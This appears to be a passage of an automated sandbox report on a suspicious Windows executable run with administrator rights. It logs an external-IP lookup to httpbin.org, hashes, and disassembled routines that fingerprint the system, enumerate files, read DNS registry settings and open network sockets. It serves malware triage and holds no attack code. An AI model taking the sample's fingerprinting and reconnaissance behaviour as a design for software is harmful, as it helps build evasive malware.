                                    Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                    Data Ascii: { "id1": "0", "data": "Done1" }
Dec 27, 2024 08:47:56.204541922 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                    Server: nginx/1.22.1
                                    Date: Fri, 27 Dec 2024 07:47:55 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Content-Length: 207
                                    Connection: close
                                    Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49708 | 3.218.7.103 | 443 | 2028 | C:\Users\user\Desktop\xXe4fTmV2h.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:47:46 UTC | 52 | OUT | GET /ip HTTP/1.1
                                    Host: httpbin.org
                                    Accept: */*
2024-12-27 07:47:46 UTC | 224 | IN | HTTP/1.1 200 OK
                                    Date: Fri, 27 Dec 2024 07:47:46 GMT
                                    Content-Type: application/json
                                    Content-Length: 31
                                    Connection: close
                                    Server: gunicorn/19.9.0
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Credentials: true
2024-12-27 07:47:46 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                    Data Ascii: { "origin": "8.46.123.189"}


                                    Target ID:5
                                    Start time:02:47:40
                                    Start date:27/12/2024
                                    Path:C:\Users\user\Desktop\xXe4fTmV2h.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\xXe4fTmV2h.exe"
                                    Imagebase:0xc00000
                                    File size:4'450'816 bytes
                                    MD5 hash:764767D6ADF6FA8A9C0B437D79A7A973
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:1.9%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:16.9%
                                      Total number of Nodes:302
                                      Total number of Limit Nodes:51
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                      • API String ID: 0-1590685507
                                      • Opcode ID: b088217d5d8d95acb30b21dc33c3a60b84b045a3817113595c04406273b4ed8b
                                      • Instruction ID: 2f7c543cc5c1046b4e0daa40c1e13d8388fcb4d23b18555af3abdf648b9167fe
                                      • Opcode Fuzzy Hash: b088217d5d8d95acb30b21dc33c3a60b84b045a3817113595c04406273b4ed8b
                                      • Instruction Fuzzy Hash: 6DC2C031A043449FD724CF29C484B6AB7E1BF84314F15CA6DECA99B262D771EE85CB81

                                      Control-flow Graph

                                      APIs
                                      • GetSystemInfo.KERNELBASE ref: 00C02579
                                      • GlobalMemoryStatusEx.KERNELBASE ref: 00C025CC
                                      • GetDriveTypeA.KERNELBASE ref: 00C02647
                                      • GetDiskFreeSpaceExA.KERNELBASE ref: 00C0267E
                                      • KiUserCallbackDispatcher.NTDLL ref: 00C027E2
                                      • FindFirstFileW.KERNELBASE ref: 00C028F8
                                      • FindNextFileW.KERNELBASE ref: 00C0291F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                      • String ID: @$`
                                      • API String ID: 3271271169-3318628307
                                      • Opcode ID: 5b30122554261526ee2e41dd67af9c34ad98465244b4c07c0d38a78bb498123a
                                      • Instruction ID: 95f25e357c1ecf7fa45c3565d772ea63efb9598649852deeacaedd896ac257c8
                                      • Opcode Fuzzy Hash: 5b30122554261526ee2e41dd67af9c34ad98465244b4c07c0d38a78bb498123a
                                      • Instruction Fuzzy Hash: D9D194B49093199FCB14FF68C58469EBBF0BF88344F008969E8D997340E7359A85CF92

                                      Control-flow Graph

                                      [Control-flow graph of the function at c029ff; edge list and Executed/Not Executed colouring omitted. Graph nodes call FindFirstFileA, RegOpenKeyExA, CharUpperA, QueryFullProcessImageNameA and CloseHandle, plus internal routines 1089c50, 1089ce0, f88da0, f88e80, f88e70, f88e68 and f88bb0]
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                      • String ID: 0
                                      • API String ID: 2406880114-4108050209
                                      • Opcode ID: 46bdbcb41a3eeb3a0c133dd124b62fd5d4c7edd3c9550a8443e243b9e1ad0a44
                                      • Instruction ID: 124bcccb94b3b0c24949f2275489a3ef9f3dac4f0b02a42a05868528b9d4d9b8
                                      • Opcode Fuzzy Hash: 46bdbcb41a3eeb3a0c133dd124b62fd5d4c7edd3c9550a8443e243b9e1ad0a44
                                      • Instruction Fuzzy Hash: 8AE1E8B49093099FCB14EF68D98869EBBF4BF44344F508869E898D7344E734DA85DF42

                                      Control-flow Graph

                                      [Control-flow graph of the function at c105b0; edge list and Executed/Not Executed colouring omitted. Graph nodes call WSAEventSelect and WSAEnumNetworkEvents, plus internal routines c17350, c070b0, c070d0, c070e0, c076a0, c103c0, c12f10, c13000, c16df0, c16fa0, c17380, c173b0, c17450 and c3dec0]
                                      APIs
                                      • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00C10712
                                      • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00C109DD
                                      • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00C109FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: EventSelect$EnumEventsNetwork
                                      • String ID: multi.c
                                      • API String ID: 2170980988-214371023
                                      • Opcode ID: dd9d4a44f940d67144d1fb2b6cd72170d1ad02c3f573a82bf49d02fbcfbe1310
                                      • Instruction ID: 9e8f25ac8ea8f9d98fc8d08c12e1b6c3f48c06f040a4e06a0c8c2c702c413b44
                                      • Opcode Fuzzy Hash: dd9d4a44f940d67144d1fb2b6cd72170d1ad02c3f573a82bf49d02fbcfbe1310
                                      • Instruction Fuzzy Hash: CDD1D5716083019FE710CF64C881BABB7E5FF96344F14492CF89586291E7B4EAC5EB92

                                      Control-flow Graph

                                      [Control-flow graph of the function at ccb180; edge list and Executed/Not Executed colouring omitted. Graph nodes call getsockname, plus internal routines ccaf30, ccb020, ccb060, ccb590, ccb660, ccb770, ccb870 and f88b00]
                                      APIs
                                      • getsockname.WS2_32(-00000020,-00000020,?), ref: 00CCB2B7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: getsockname
                                      • String ID: ares__sortaddrinfo.c$cur != NULL
                                      • API String ID: 3358416759-2430778319
                                      • Opcode ID: e855819367c60a354cfb4c91ed2f6c2a4ec1ba7e67a3f55ec90ab53be3d5927d
                                      • Instruction ID: 9fc642760494d2f5c2979e60b6227deed5e72f7587ceefd4612b10e967bc6a0b
                                      • Opcode Fuzzy Hash: e855819367c60a354cfb4c91ed2f6c2a4ec1ba7e67a3f55ec90ab53be3d5927d
                                      • Instruction Fuzzy Hash: 8AC17D716043059FD718DFA4C882F6A77E5AF88314F08886CF8599B3A2DB35ED45DB81
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b7825216cc0431b25355376ba5e301d1796b1aa87f7ac469d37e6c5fc335cb4e
                                      • Instruction ID: a31a0e2d49e26ff475e6389225af752ebc41cab5ac1bec100ac8de0de0424239
                                      • Opcode Fuzzy Hash: b7825216cc0431b25355376ba5e301d1796b1aa87f7ac469d37e6c5fc335cb4e
                                      • Instruction Fuzzy Hash: 6F91E33060D3098BD7359A2988847FB72F5EBC6320F648B2CE8A9431E4D7759E81F681
                                      APIs
                                      • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00CB712E,?,?,?,00001001,00000000), ref: 00CCA90C
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: recvfrom
                                      • String ID:
                                      • API String ID: 846543921-0
                                      • Opcode ID: 81fac7e04a11ac21ef2fce685a94f9a2c9bc6388c6126832b01d2caa66ec0943
                                      • Instruction ID: a8589f79a2a0f2865e4b91c0b0b86119d32e7d9799c4fb5f713eaf2120b09215
                                      • Opcode Fuzzy Hash: 81fac7e04a11ac21ef2fce685a94f9a2c9bc6388c6126832b01d2caa66ec0943
                                      • Instruction Fuzzy Hash: CEF06D7510830CAFD2209E02DC89E6BBBEDEFC9758F05456DF958232118271AE11CAB2
                                      APIs
                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00CBAA19
                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00CBAA4C
                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00CBAA97
                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00CBAAE9
                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00CBAB30
                                      • RegCloseKey.KERNELBASE(?), ref: 00CBAB6A
                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00CBAB82
                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00CBAC46
                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00CBAD0A
                                      • RegEnumKeyExA.KERNELBASE ref: 00CBAD8D
                                      • RegCloseKey.KERNELBASE(?), ref: 00CBADD9
                                      • RegEnumKeyExA.KERNELBASE ref: 00CBAE08
                                      • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00CBAE2A
                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00CBAE54
                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00CBAF63
                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00CBAFB2
                                      • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00CBB072
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: QueryValue$Open$CloseEnum
                                      • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                      • API String ID: 4217438148-1047472027
                                      • Opcode ID: 47a530f3d273dfcb017abad13d472770fa51a60eb115970f8cad839c90a3cdad
                                      • Instruction ID: d56600e50f94235f22a4f141138926a04296d5c58577e0d82520dfd075c95ca4
                                      • Opcode Fuzzy Hash: 47a530f3d273dfcb017abad13d472770fa51a60eb115970f8cad839c90a3cdad
                                      • Instruction Fuzzy Hash: A972BFB1604341AFE7209B24DC86BAB7BE8EF85700F14482CF9959B291E775EA44CB53
                                      APIs
                                      • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00C3A832
                                      Strings
                                      • Could not set TCP_NODELAY: %s, xrefs: 00C3A871
                                      • Couldn't bind to '%s' with errno %d: %s, xrefs: 00C3AE1F
                                      • @, xrefs: 00C3AC42
                                      • cf-socket.c, xrefs: 00C3A5CD, 00C3A735
                                      • Bind to local port %d failed, trying next, xrefs: 00C3AFE5
                                      • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00C3AD0A
                                      • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00C3A6CE
                                      • Local port: %hu, xrefs: 00C3AF28
                                      • cf_socket_open() -> %d, fd=%d, xrefs: 00C3A796
                                      • @, xrefs: 00C3A8F4
                                      • Local Interface %s is ip %s using address family %i, xrefs: 00C3AE60
                                      • Name '%s' family %i resolved to '%s' family %i, xrefs: 00C3ADAC
                                      • Trying [%s]:%d..., xrefs: 00C3A689
                                      • Trying %s:%d..., xrefs: 00C3A7C2, 00C3A7DE
                                      • bind failed with errno %d: %s, xrefs: 00C3B080
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: setsockopt
                                      • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                      • API String ID: 3981526788-2373386790
                                      • Opcode ID: 06f08b63e57e22ff2b2665547f60d9a4654f92e2e5fcf6a4a39e02d6eb13e909
                                      • Instruction ID: 573ddce700fc40ecfac677c94da6a400f9e48c5d49461ebed6ab6ac6a11fb523
                                      • Opcode Fuzzy Hash: 06f08b63e57e22ff2b2665547f60d9a4654f92e2e5fcf6a4a39e02d6eb13e909
                                      • Instruction Fuzzy Hash: 1C620171518381ABE724CF24C886BABB7E4BF85304F044929F99897292E771E954CB93

                                      Control-flow Graph

                                      APIs
                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00CC9946
                                      • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00CC9974
                                      • RegCloseKey.KERNELBASE(?), ref: 00CC998B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                      • API String ID: 3677997916-4129964100
                                      • Opcode ID: 3d2520f71aee8dd58716ff13a71547aa62e4d909a6029702f93a1ffa4c42d3e1
                                      • Instruction ID: 792d9ff336c874b0d5e239df91d9a3bc2cebe681e1acfc502d8cc2854392f262
                                      • Opcode Fuzzy Hash: 3d2520f71aee8dd58716ff13a71547aa62e4d909a6029702f93a1ffa4c42d3e1
                                      • Instruction Fuzzy Hash: FD32B5B5904201ABEB11AB24EC4AF9B76E4EF54714F08443CF91A96263F731EE14E793

                                      Control-flow Graph

                                      APIs
                                      • connect.WS2_32(?,?,00000001), ref: 00C38C30
                                      • SleepEx.KERNELBASE(00000000,00000000), ref: 00C38CF3
                                      • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00C38D0E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: Sleepconnectgetsockopt
                                      • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                      • API String ID: 1669343778-879669977
                                      • Opcode ID: a140feca7259f2950887532b8a59de1d1689b7cf8acf831a13be4c1e57ebff6c
                                      • Instruction ID: eed8ac5cc5a8ce5560771fbc468df81d9562a8e236c2c54eaf851f8cc70a46fd
                                      • Opcode Fuzzy Hash: a140feca7259f2950887532b8a59de1d1689b7cf8acf831a13be4c1e57ebff6c
                                      • Instruction Fuzzy Hash: C8B1E174614306AFDB10DF24DC85BA6BBE0AF45318F04852CF8694B2D2DB70ED58CB62

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: CloseEnumOpen
                                      • String ID: d
                                      • API String ID: 1332880857-2564639436
                                      • Opcode ID: 42f173ced592e10f70cd875d4af32ef196483a035463bc7df7e169e40261cdd5
                                      • Instruction ID: 0dabaca2ecce77d21e215f981905354ba60341f53e4ee5b8c2a46208c28d5cd5
                                      • Opcode Fuzzy Hash: 42f173ced592e10f70cd875d4af32ef196483a035463bc7df7e169e40261cdd5
                                      • Instruction Fuzzy Hash: 9D7198B490831A9FDB14EF69D58479EBBF0BF84308F10885DE498A7340D7749A89CF92

                                      Control-flow Graph
                                      control_flow_graph 1491 c39290-c392ed call c076a0 1494 c393c3-c393ce 1491->1494 1495 c392f3-c392fb 1491->1495 1504 c393d0-c393e1 1494->1504 1505 c393e5-c39427 call c1d090 call c44f40 1494->1505 1496 c39301-c39333 call c1d8c0 call c1d9a0 1495->1496 1497 c393aa-c393af 1495->1497 1515 c393a7 1496->1515 1516 c39335-c39364 WSAIoctl 1496->1516 1498 c39456-c39470 1497->1498 1499 c393b5-c393bc 1497->1499 1502 c39429-c39431 1499->1502 1503 c393be 1499->1503 1509 c39433-c39437 1502->1509 1510 c39439-c3943f 1502->1510 1503->1498 1504->1499 1511 c393e3 1504->1511 1505->1498 1505->1502 1509->1498 1509->1510 1510->1498 1514 c39441-c39453 call c450a0 1510->1514 1511->1498 1514->1498 1515->1497 1519 c39366-c3936f 1516->1519 1520 c3939b-c393a4 1516->1520 1519->1520 1523 c39371-c39390 setsockopt 1519->1523 1520->1515 1523->1520 1524 c39392-c39395 1523->1524 1524->1520
                                      APIs
                                      • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00C3935D
                                      • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00C39389
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: Ioctlsetsockopt
                                      • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                      • API String ID: 1903391676-2691795271
                                      • Opcode ID: a218ffbec21eba9c13bf5d973cfa028330cfd6eecceea9759ad2c3f0c3574699
                                      • Instruction ID: ab9d014ff0b7d5a76d3cded72ee26325f9b7f407197c03618a1929c6897bf10a
                                      • Opcode Fuzzy Hash: a218ffbec21eba9c13bf5d973cfa028330cfd6eecceea9759ad2c3f0c3574699
                                      • Instruction Fuzzy Hash: 6A51F571A00305ABE714DF24C881FAAB7A5FF85314F148529FD588B292E770EA91CB91

                                      Control-flow Graph
                                      control_flow_graph 1525 c076a0-c076be 1526 c076c0-c076c7 1525->1526 1527 c076e6-c076f2 send 1525->1527 1526->1527 1530 c076c9-c076d1 1526->1530 1528 c076f4-c07709 call c072a0 1527->1528 1529 c0775e-c07762 1527->1529 1528->1529 1531 c076d3-c076e4 1530->1531 1532 c0770b-c07759 call c072a0 call c0cb20 call f88c50 1530->1532 1531->1528 1532->1529
                                      APIs
                                      • send.WS2_32(multi.c,?,?,?,00C03D4E,00000000,?,?,00C107BF), ref: 00C076EB
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: send
                                      • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                      • API String ID: 2809346765-3388739168
                                      • Opcode ID: 5d32d342d558c6521bb47d5785f380504ac94d7464fc397fa716a9c9e22f8e50
                                      • Instruction ID: c086c79198c716cf42834a637b639b91fa6e82994fd8abae6c4c42518c2d1121
                                      • Opcode Fuzzy Hash: 5d32d342d558c6521bb47d5785f380504ac94d7464fc397fa716a9c9e22f8e50
                                      • Instruction Fuzzy Hash: 2B110DF5E193157BD124A719EC8AE373B5CDB82B68F450B0CBC2557341D651AD01C2B2

                                      Control-flow Graph
                                      control_flow_graph 1644 c07770-c0778e 1645 c07790-c07797 1644->1645 1646 c077b6-c077c2 recv 1644->1646 1645->1646 1649 c07799-c077a1 1645->1649 1647 c077c4-c077d9 call c072a0 1646->1647 1648 c0782e-c07832 1646->1648 1647->1648 1651 c077a3-c077b4 1649->1651 1652 c077db-c07829 call c072a0 call c0cb20 call f88c50 1649->1652 1651->1647 1652->1648
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmp
